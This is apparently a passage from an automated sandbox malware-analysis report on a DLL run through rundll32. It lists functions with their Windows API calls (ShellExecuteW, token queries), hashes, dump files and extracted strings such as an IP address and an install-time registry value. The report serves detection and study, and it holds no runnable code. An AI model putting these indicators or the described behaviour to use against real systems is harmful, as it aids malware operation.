                                                                    • Part of subcall function 00000001800495A4: GetCurrentProcessId.KERNEL32 ref: 00000001800495CE
                                                                    • Part of subcall function 00000001800495A4: ??_U@YAPEAX_K@Z.MSVCRT ref: 00000001800495FA
                                                                    • Part of subcall function 00000001800495A4: GetTokenInformation.ADVAPI32 ref: 0000000180049629
                                                                    • Part of subcall function 00000001800495A4: GetSidSubAuthorityCount.ADVAPI32 ref: 0000000180049636
                                                                    • Part of subcall function 00000001800495A4: GetLastError.KERNEL32 ref: 000000018004963F
                                                                    • Part of subcall function 00000001800495A4: GetSidSubAuthority.ADVAPI32 ref: 0000000180049658
                                                                    • Part of subcall function 00000001800495A4: ??_V@YAXPEAX@Z.MSVCRT ref: 000000018004967B
                                                                    • Part of subcall function 00000001800494C4: ??_U@YAPEAX_K@Z.MSVCRT ref: 00000001800494DA
                                                                  • memset.MSVCRT ref: 000000018004AF8E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: AuthorityCountCurrentProcess$ErrorExecuteInformationLastShellTickTokenmemsetsrand
                                                                  • String ID: p
                                                                  • API String ID: 526592482-2181537457
                                                                  • Opcode ID: db20606bd2f8c5ddcc62ab015699e8350b9eea6392e973e239eb88e586f6bc5b
                                                                  • Instruction ID: c7a46caf8343ac9de693e6305f929c410170157657da93c1511d6525c5ccc842
                                                                  • Opcode Fuzzy Hash: db20606bd2f8c5ddcc62ab015699e8350b9eea6392e973e239eb88e586f6bc5b
                                                                  • Instruction Fuzzy Hash: B221B632208F8885E7A1DF51F48078AB3A4F799BC4F158021BE8D43B59DF38C549CB44
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018004B054 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ShellExecuteW.SHELL32 ref: 000000018004B0BF
                                                                    • Part of subcall function 00000001800495A4: GetTickCount.KERNEL32 ref: 00000001800495AC
                                                                    • Part of subcall function 00000001800495A4: srand.MSVCRT ref: 00000001800495B4
                                                                    • Part of subcall function 00000001800495A4: GetCurrentProcessId.KERNEL32 ref: 00000001800495BA
                                                                    • Part of subcall function 00000001800495A4: GetCurrentProcessId.KERNEL32 ref: 00000001800495CE
                                                                    • Part of subcall function 00000001800495A4: ??_U@YAPEAX_K@Z.MSVCRT ref: 00000001800495FA
                                                                    • Part of subcall function 00000001800495A4: GetTokenInformation.ADVAPI32 ref: 0000000180049629
                                                                    • Part of subcall function 00000001800495A4: GetSidSubAuthorityCount.ADVAPI32 ref: 0000000180049636
                                                                    • Part of subcall function 00000001800495A4: GetLastError.KERNEL32 ref: 000000018004963F
                                                                    • Part of subcall function 00000001800495A4: GetSidSubAuthority.ADVAPI32 ref: 0000000180049658
                                                                    • Part of subcall function 00000001800495A4: ??_V@YAXPEAX@Z.MSVCRT ref: 000000018004967B
                                                                    • Part of subcall function 00000001800494C4: ??_U@YAPEAX_K@Z.MSVCRT ref: 00000001800494DA
                                                                  • memset.MSVCRT ref: 000000018004B0DA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: AuthorityCountCurrentProcess$ErrorExecuteInformationLastShellTickTokenmemsetsrand
                                                                  • String ID: p
                                                                  • API String ID: 526592482-2181537457
                                                                  • Opcode ID: f2d62255b16ca96ed2cbf9c0141287d8586ff51f1b7a2213e7ec1c807b59ad21
                                                                  • Instruction ID: 630a19f9e7c8d33164371876bc9408f173fd4fcd3dffaf0243fab21a92527801
                                                                  • Opcode Fuzzy Hash: f2d62255b16ca96ed2cbf9c0141287d8586ff51f1b7a2213e7ec1c807b59ad21
                                                                  • Instruction Fuzzy Hash: E1217432204F8885E7A1DF61F48078AB7A4F788BC4F558121FE8883B5ADF38C654CB44
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018005AFB8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Value
                                                                  • String ID: MsgCenter$opentime_afterinstall
                                                                  • API String ID: 3702945584-3718352646
                                                                  • Opcode ID: bc51746a4845ef3513b79512763e58b7b7c59a9adac5c6c1a917732545d0aad2
                                                                  • Instruction ID: 9121a4dbc030fef007b745f88a0fe18748c482634fd5ebee216f5006264a8ac8
                                                                  • Opcode Fuzzy Hash: bc51746a4845ef3513b79512763e58b7b7c59a9adac5c6c1a917732545d0aad2
                                                                  • Instruction Fuzzy Hash: AC116A72600B4482EB508F29E44438AB760F789BF4F108316EB79437E4CF79C688CB84
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180074CC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40sleepthreadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentSleepThread
                                                                  • String ID: 171.8.167.45
                                                                  • API String ID: 1164918020-2723241389
                                                                  • Opcode ID: b82daa9be066ead2ec14612a1a02b00537e7c47846788e1f0fd2d6a2c4d35c95
                                                                  • Instruction ID: 739a1f1183ec9c18e579ba8ee55cb859ca32a6d953d7c9429809cc63265ca520
                                                                  • Opcode Fuzzy Hash: b82daa9be066ead2ec14612a1a02b00537e7c47846788e1f0fd2d6a2c4d35c95
                                                                  • Instruction Fuzzy Hash: B201D13370425586E7A3DFA9B88039E66A0F74C7E0F058431FF4487655EF79C99A8B80
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018005B060 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Value
                                                                  • String ID: MsgCenter$opentime_afterinstall
                                                                  • API String ID: 3702945584-3718352646
                                                                  • Opcode ID: 5bc7ba386a7905614b99b0fc8fa89d0a447947fd7441929353b8c1a08fc42a0a
                                                                  • Instruction ID: 21b9b515d364e76d08f8b9de98a0e6c83aa7314f475d7e108810017b28aec3e9
                                                                  • Opcode Fuzzy Hash: 5bc7ba386a7905614b99b0fc8fa89d0a447947fd7441929353b8c1a08fc42a0a
                                                                  • Instruction Fuzzy Hash: DA0188B2611B4482DB10DF69D854389B760F788BB0F00831AEA79137E4DF78C699CB44
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018008455E Relevance: 5.0, APIs: 4, Instructions: 43COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionThrow
                                                                  • String ID:
                                                                  • API String ID: 432778473-0
                                                                  • Opcode ID: 114c5287cdb026fffe76d3c7f9949e070cfa45e7e663d84f565ee682834d51f6
                                                                  • Instruction ID: 38ed7ffc1fc9f375285380fd3d7b3dc2d70f7ac5fc31fc0dcffbf51ad022335a
                                                                  • Opcode Fuzzy Hash: 114c5287cdb026fffe76d3c7f9949e070cfa45e7e663d84f565ee682834d51f6
                                                                  • Instruction Fuzzy Hash: 9D0184B1650A88C9E79DFF33A8063FB6212BBD87C0F18C835B9954B65BDE25C21A4700
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%